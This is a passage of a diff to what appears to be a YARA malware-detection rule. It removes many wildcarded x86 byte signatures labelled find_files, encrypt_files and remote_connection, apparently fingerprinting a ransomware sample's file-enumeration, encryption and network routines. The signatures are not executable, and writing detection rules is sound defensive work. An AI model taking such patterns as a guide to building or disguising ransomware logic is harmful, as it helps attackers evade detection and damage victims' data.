-            EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 39 D0 0F
-            87 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 83 EC ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 7D ?? 8D
-        }
-		$find_files_p2 = {
-            9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 D9 8B 00 C6 44 24 ?? ?? 8B 57 ?? 89 B5 ?? ?? ??
-            ?? 89 04 24 8D 14 50 89 54 24 ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 1C 24
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 C6 0F 84 ??
-            ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? F6 85 ?? ??
-            ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 0F 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 5C 24 ?? 89 34 24 FF 15 ?? ?? ??
-            ?? 83 EC ?? 85 C0 75 ?? 89 34 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 9D ?? ?? ??
-            ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ?? ?? 8D 76
-            ?? 8D BC 27 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
-        }
-		$find_files_p3 = {
-            8B 45 ?? F6 85 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 75
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 89
-            C3 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ??
-            ?? EB ?? 89 C3 8B 85 ?? ?? ?? ?? 39 F0 75 ?? EB ?? EB ?? EB ?? 89 C3 EB ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-        }
-		$encrypt_files_p1 = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 00 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83
-            F8 ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ??
-            89 34 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ??
-            89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 34 24 05 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 89 44 24 ?? 83 D2 ?? A1 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85
-            ?? ?? ?? ?? FF D0 31 C0 83 EC ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AB 7C ?? 0F
-            8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 74 24 ?? 89 04 24 FF 15 ?? ?? ?? ??
-            83 EC ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 35 ?? ?? ?? ?? 0B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            80 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ??
-            ?? ?? 89 D9 89 04 24 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 83 EC ?? 8B B5 ?? ?? ?? ?? 89 D9 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 1E 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
-        }
-		$encrypt_files_p2 = {
-            85 ?? ?? ?? ?? 89 04 24 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 8B
-            85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24
-            ?? 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 04 24 89 54
-            24 ?? 8B 0E 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
-            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8B 85
-            ?? ?? ?? ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? C7 04 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F AC D0 ?? C1 EA ?? 89 D3 09
-            C3 0F 84 ?? ?? ?? ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 D2 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            90 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C
-        }
-		$encrypt_files_p3 = {
-            24 ?? 89 0C 24 8B 0A E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B
-            9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 89 54 24 ?? 89 1C 24
-            FF 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 81 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 5C
-            24 ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83
-            EC ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 D9 83 95 ?? ?? ?? ?? ?? 8B 02 89 04 24 E8 ??
-            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 0B 89 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0B E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 EC ?? 89 04 24 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B
-            85 ?? ?? ?? ?? 89 44 24 ?? 8B 0B E8 ?? ?? ?? ?? 8B 0B 83 EC ?? E8 ?? ?? ?? ?? 8B 9D
-            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 1C 24 FF 15 ?? ?? ?? ?? 8B
-        }
-		$encrypt_files_p4 = {
-            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 1C
-            24 89 44 24 ?? 89 54 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 83 85 ?? ?? ?? ?? ?? 8B 9D ??
-            ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            31 CB 31 D0 89 DA 09 C2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ??
-            89 C3 89 44 24 ?? 89 0C 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 8B 08 E8 ?? ??
-            ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 7C 24 ?? 8B BD ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 8B
-            95 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 5C 24 ?? 8B 1D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 89 74 24 ?? 89 54 24 ?? 89 3C 24 89 9D ?? ?? ?? ?? FF D3 8B 95 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 EC ?? B9 ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_p5 = {
-            89 DF C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F AC D0 ?? C1 EA
-            ?? 01 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 11 95 ?? ?? ?? ?? 31 C0 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 89 7C 24 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 C0 F3 AB 8B BD ?? ?? ?? ?? 89 74
-            24 ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ??
-            89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
-            EC ?? 8B 18 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? 8D BD ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8B B5
-            ?? ?? ?? ?? 31 D2 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 AB 8B BD ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 89 F9 C1 F9 ?? 83 E1 ?? 89 C8 01 F0 11 FA 0F AC D0 ?? C1 FA ?? 83
-        }
-		$encrypt_files_p6 = {
-            C0 ?? 83 D2 ?? 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 FA 09 F2
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 F7 C6 00 ?? 83 C0 ?? 39 C2 75 ?? 89 BD
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 D9 89 04
-            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 18 A1 ?? ?? ?? ?? 89 44 24 ?? 8D 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 89
-            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 83 C0
-            ?? 83 EC ?? 8B 56 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 7D ?? 29 C2 8D B5 ?? ?? ?? ?? 8D 9D
-            ?? ?? ?? ?? 8B 0F C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? 8D 0C 41 8D 04 51 89 0C 24 89 F1
-            89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 34 24 8D 48 ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ??
-            8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 47 ?? 89 34 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0F C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 90 89 34 24 8B
-            0F 83 C6 ?? E8 ?? ?? ?? ?? 83 EC ?? 39 DE 75 ?? 8B BD ?? ?? ?? ?? 8B B5
-        }
-		$encrypt_files_p7 = {
-            8B 0F E8 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            04 24 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ??
-            8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 0F 89 95 ?? ?? ?? ?? 89 95
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0F E8 ?? ?? ?? ?? 8B 0F 83 EC ?? E8 ??
-            ?? ?? ?? 8B 0F 89 F7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 89 34 24 8D B5 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
-            EC ?? 89 3C 24 C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 85 FF 0F 85 ?? ??
-            ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D
-            ?? ?? ?? ?? 0F 97 C0 0F B6 C0 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ??
-            ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8D 65
-            ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15
-        }
-		$encrypt_files_p8 = {
-            83 EC ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? 89 C6 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 C1 F8 ?? 89 F1 89
-            44 24 ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 89 B5 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 89 C3 A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 89
-            04 24 89 54 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ??
-            ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            7C 24 ?? 89 44 24 ?? 89 34 24 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 5C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 83 C3 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 89 44 24 ?? FF
-            95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 39 C3 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 76 ?? 81 BD ?? ??
-            ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 C6 C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 34 24 E8 ??
-            ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB
-          }
-		$remote_connection_p1 = {
-            55 57 56 53 81 EC ?? ?? ?? ?? 8B 1A 39 18 0F 84 ?? ?? ?? ?? 89 54 24 ?? 89 C6 8D 5C
-            24 ?? F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 DF 8B 56 ?? 89 54 24
-            ?? 8B 56 ?? 89 54 24 ?? 8B 56 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89
-            3C 24 E8 ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 BA ?? ?? ?? ?? 89 D5
-            29 C5 F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 06 89 44 24 ?? 8B 46 ?? 89 44 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 8B 7C 24 ??
-            8B 07 89 04 24 E8 ?? ?? ?? ?? FF 47 ?? 8B 46 ?? 01 47 ?? 8B 6E ?? 85 ED 0F 84 ?? ??
-            ?? ?? 89 6C 24 ?? 8D 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 85 C0 74 ?? C6 03 ?? A8 ?? 0F 85 ??
-            ?? ?? ?? 8B 7D ?? 8B 75 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 7C 24 ?? 89 74 24 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 74 24 ?? 29 F0 89 44 24 ?? 8D 04 33 89
-            04 24 E8 ?? ?? ?? ?? 89 DF 8B 17 83 C7 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ??
-            ?? 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 88 C1 00 C1 83 DF ?? 29 DF 8B 75
-        }
-		$remote_connection_p2 = {
-            89 34 24 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 29 F9 39 C1 0F 8D ?? ?? ?? ?? 8D 04 3B 83 F9
-            ?? 0F 83 ?? ?? ?? ?? 85 C9 74 ?? 8A 16 88 10 F6 C1 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 01 D8 89 04 24 E8 ?? ?? ?? ??
-            89 5C 24 ?? 8B 44 24 ?? 8B 00 89 04 24 E8 ?? ?? ?? ?? 8B 6D ?? 85 ED 74 ?? 8D 44 24
-            ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 44 24 ?? 8B 44 24 ?? 83 F8 ??
-            0F 82 ?? ?? ?? ?? C7 44 03 ?? ?? ?? ?? ?? 8D 48 ?? C1 E9 ?? 89 DF B8 ?? ?? ?? ?? F3
-            AB E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 90 8D 74 26 ??
-            8D 40 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 10 89 54 24 ?? 8B 50 ?? 89 54 24 ?? 8B 40 ?? 89
-            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89
-            DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? A9
-        }
-		$remote_connection_p3 = {
-            75 ?? C1 E8 ?? 83 C2 ?? 88 C1 00 C1 83 DA ?? 29 DA 8D 3C 13 B8 ?? ?? ?? ?? 29 D0 E9
-            ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 29 F8 89 44 24 ?? 89
-            74 24 ?? 01 DF 89 3C 24 E8 ?? ?? ?? ?? 89 D8 8B 08 83 C0 ?? 8D 91 ?? ?? ?? ?? F7 D1
-            21 CA 81 E2 ?? ?? ?? ?? 74 ?? F7 C2 ?? ?? ?? ?? 75 ?? C1 EA ?? 83 C0 ?? 88 D1 00 D1
-            83 D8 ?? 29 D8 BA ?? ?? ?? ?? 29 C2 E9 ?? ?? ?? ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ??
-            8B 16 89 10 8B 54 0E ?? 89 54 08 ?? 8D 78 ?? 83 E7 ?? 29 F8 29 C6 01 C1 C1 E9 ?? F3
-            A5 E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 89 54 24 ?? 8D 46 ?? 89
-            04 24 E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ??
-            ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 8B 54 24 ?? 29 C2 89 D5 E9 ?? ??
-            ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 8B 44 24 ?? 66 C7 44 03 ?? ?? ?? E9
-            ?? ?? ?? ?? 66 8B 54 0E ?? 66 89 54 08 ?? E9 ?? ?? ?? ?? 90 8B 54 24 ?? 8B 44 24 ??
-            E9
-        }
+	condition:
